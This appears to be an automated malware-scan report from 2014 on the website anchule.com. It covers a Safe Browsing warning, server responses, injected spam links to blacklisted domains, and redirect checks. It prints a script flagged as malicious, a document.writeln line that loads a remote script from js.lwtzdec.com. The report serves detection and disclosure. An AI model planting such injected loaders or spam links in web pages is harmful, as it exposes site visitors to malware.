Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=anchule.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://anchule.com/ | HTTP/1.1 200 OK Date: Wed, 10 Sep 2014 05:04:53 GMT Accept-Ranges: bytes ETag: "52392d7b6fcccf1:94a3" Server: Microsoft-IIS/6.0 Content-Length: 14519 Content-Location: http://anchule.com/index.html Content-Type: text/html Last-Modified: Tue, 09 Sep 2014 20:48:59 GMT X-Powered-By: ASP.NET | clean |
http://anchule.com/index.html | 200 OK Content-Length: 14519 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: caob365.com ...[2900 bytes skipped]... gt; <div class="bl"></div> <div class="br"></div> <div class="bm"></div> </div> </td> </tr> </table> <div class="blank"></div> <div style=" border:1px solid #c4d9ea; padding:0 20px"> <div style="overflow:hidden;width:900px;margin:5px; line-height:24px;"> <b>ÓÑÇéÁ´½Ó:</b> <li class="no1"><a href="http://caob365.com" title="ÑÇÖÞÉÙ¸¾Òùͼ">ÑÇÖÞÉÙ¸¾Òùͼ</a></li> <li class="no1"><a href="http://aise10.com" title="ÃÀÍÈË¿ÍàÀÏɧ»õϵÁÐ">ÃÀÍÈË¿ÍàÀÏɧ»õϵÁÐ</a></li> <li class="no1"><a href="http://54u9d55.com" title="±±ÌõÂéåú½ð">±±ÌõÂéåú½ð</a></li> <li class="no1"><a href="http://tanliu.com.cn" title="ÀÇƤÏÈÉúº«¹úÍêÕû°æ">ÀÇƤÏÈÉúº«¹úÍêÕû°æ</a></li> <li class="no1"><a href="http://qanhsvq.co ...[1185 bytes skipped]... | ||
http://anchule.com/sdjnjrs/25K1.js | HTTP/1.1 200 OK Date: Wed, 10 Sep 2014 05:04:55 GMT Accept-Ranges: bytes ETag: "7ee2a29685becf1:94a3" Server: Microsoft-IIS/6.0 Content-Length: 1530 Content-Location: http://anchule.com/404.html?404;http://anchule.com:80/sdjnjrs/25K1.js Content-Type: text/html Last-Modified: Sat, 23 Aug 2014 03:51:58 GMT X-Powered-By: ASP.NET | clean |
http://anchule.com/404.html?404;http://anchule.com:80/sdjnjrs/25k1.js | 200 OK Content-Length: 1530 Content-Type: text/html | clean |
http://anchule.com/common.js | 200 OK Content-Length: 96 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: js.lwtzdec.com document.writeln("<SCRIPT language=javascript src=\"http://js.lwtzdec.com/zy.js\"></SCRIPT>");
Decoded script: <SCRIPT language=javascript src="http://js.lwtzdec.com/zy.js"></SCRIPT> | ||
http://www.qq.com/404/search_children.js | 200 OK Content-Length: 295 Content-Type: application/x-javascript | clean |
http://anchule.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://anchule.com/test404page.js | HTTP/1.1 200 OK Date: Wed, 10 Sep 2014 05:04:59 GMT Accept-Ranges: bytes ETag: "7ee2a29685becf1:94a3" Server: Microsoft-IIS/6.0 Content-Length: 1530 Content-Location: http://anchule.com/404.html?404;http://anchule.com:80/test404page.js Content-Type: text/html Last-Modified: Sat, 23 Aug 2014 03:51:58 GMT X-Powered-By: ASP.NET | clean |
http://anchule.com/404.html?404;http://anchule.com:80/test404page.js | 200 OK Content-Length: 1530 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: anchule.com
Result:
HTTP/1.1 200 OK
Date: Wed, 10 Sep 2014 05:04:53 GMT
Accept-Ranges: bytes
ETag: "52392d7b6fcccf1:94a3"
Server: Microsoft-IIS/6.0
Content-Length: 14519
Content-Location: http://anchule.com/index.html
Content-Type: text/html
Last-Modified: Tue, 09 Sep 2014 20:48:59 GMT
X-Powered-By: ASP.NET
...14519 bytes of data.
GET / HTTP/1.1
Host: anchule.com
Result:
HTTP/1.1 200 OK
Date: Wed, 10 Sep 2014 05:04:53 GMT
Accept-Ranges: bytes
ETag: "52392d7b6fcccf1:94a3"
Server: Microsoft-IIS/6.0
Content-Length: 14519
Content-Location: http://anchule.com/index.html
Content-Type: text/html
Last-Modified: Tue, 09 Sep 2014 20:48:59 GMT
X-Powered-By: ASP.NET
...14519 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: anchule.com
Referer: http://www.google.com/search?q=anchule.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: anchule.com
Referer: http://www.google.com/search?q=anchule.com
Result:
The result is similar to the first query. There are no suspicious redirects found.